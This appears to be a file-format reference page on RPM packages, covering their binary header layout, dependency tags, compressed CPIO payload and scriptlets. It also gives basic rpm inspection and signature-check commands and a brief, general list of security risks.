RPM Package
An RPM file is a Linux package format used by Red Hat, Fedora, SUSE, and derivative distributions. FileDex provides reference information only.
Linux package format. Cross-distribution conversion requires repackaging.
Common questions
How do I view the contents of an RPM file without installing it?
Run `rpm -qlp package.rpm` to list all files the package would install. For full metadata including dependencies and description, use `rpm -qip package.rpm`. To actually extract the files, pipe through rpm2cpio and cpio as described in the CLI snippets.
What is the difference between RPM and DNF/YUM?
RPM is the low-level tool that installs, queries, and verifies individual packages. DNF (and its predecessor YUM) is a higher-level package manager that resolves dependencies across repositories, downloads required packages, and hands them to RPM for installation. Think of RPM as the engine and DNF as the driver.
Can I install an RPM on Ubuntu or Debian?
Not directly — Debian-based systems use the .deb format and dpkg/apt toolchain. The alien utility can convert RPM packages to .deb format, but the conversion is lossy and scriptlets may not translate correctly. Building from source or finding a native .deb package is generally more reliable.
How do I verify that an RPM has not been tampered with?
Run `rpm --checksig package.rpm` to verify the embedded GPG signature and SHA256 digest. This requires the signing key to be imported into your RPM keyring via `rpm --import`. Unsigned packages will show "MISSING KEYS" and should be treated with caution.
What makes .RPM special
Package management on Red Hat-derived Linux distributions centers on the RPM format, a binary container that bundles compiled software with metadata, dependency declarations, and install-time scripts into a single distributable file.
Continue reading — full technical deep dive
Header Architecture
The RPM header magic 8E AD E8 01 appears twice in every package — once for the signature header and once for the main header — preceded by a legacy lead section with its own magic ED AB EE DB. The lead occupies the first 96 bytes and exists solely for backward compatibility with tools predating RPM v3. Following the lead, the signature header stores digest and size values used to verify package integrity before extraction. The main header contains all package metadata: name, version, release, architecture, changelogs, file lists, and dependency tags. Each header uses an index-store layout: a fixed-size index array followed by a variable-length data store, with each index entry specifying a tag ID, data type, offset, and count.
Dependency Resolution
RPM tracks four dependency relationship types through header tags: Requires (what must be present), Provides (what capabilities a package offers), Conflicts (mutual exclusions), and Obsoletes (upgrade replacements). Each tag supports version comparison operators and can reference virtual capabilities rather than package names. The rpm tool itself only verifies these relationships — actual resolution and download falls to higher-level tools like dnf or yum, which build a dependency graph across all configured repositories and compute a transaction set. Rich dependencies, added in RPM 4.13, allow boolean expressions combining AND, OR, and IF conditions within a single Requires tag.
Payload and Compression
Beneath the headers sits a CPIO archive containing the actual files, compressed with gzip, xz, or zstd depending on the build configuration. The rpm2cpio utility strips the headers and outputs the raw CPIO stream, which cpio or bsdtar can then extract. This two-step extraction works even on non-RPM systems, making the format inspectable anywhere. Zstd compression, the default since Fedora 31, achieves faster decompression than xz at comparable ratios, reducing install transaction times on large packages.
Scriptlets
RPM supports six scriptlet hooks: pretrans, pre, post, posttrans, preun, and postun. These shell or Lua scripts run at specific points during install and removal transactions. Scriptlets execute as root, and a failing scriptlet can leave the system in an inconsistent state if the transaction is only partially applied. Lua scriptlets run inside the rpm process itself without forking a shell, making them faster and available even when /bin/sh is not yet installed (useful for base system packages). The rpm -qp --scripts command reveals all embedded scriptlets before installation.
Related Formats
Technical reference
- MIME Type
application/x-rpm- Magic Bytes
ED AB EE DBRPM magic number.- Developer
- Red Hat
- Year Introduced
- 1997
- Open Standard
- Yes
RPM magic number.
Binary Structure
Sequential binary layout: 96-byte lead (magic ED AB EE DB), signature header (magic 8E AD E8 01) with alignment padding to 8-byte boundary, main header (same magic), then a compressed CPIO archive payload. Each header section contains an index of typed tag entries pointing to a data store region. Tags use 32-bit identifiers with type codes for INT32, STRING, BIN, and STRING_ARRAY.
Attack Vectors
- Arbitrary code execution through scriptlets (pre/post/pretrans/posttrans) that run as root during installation
- Privilege escalation via setuid binaries included in the CPIO payload that gain root permissions upon extraction
- Supply chain compromise by signing packages with stolen GPG keys or injecting modified packages into repository mirrors
Mitigation: FileDex does not execute, install, mount, or parse these files. Reference page only.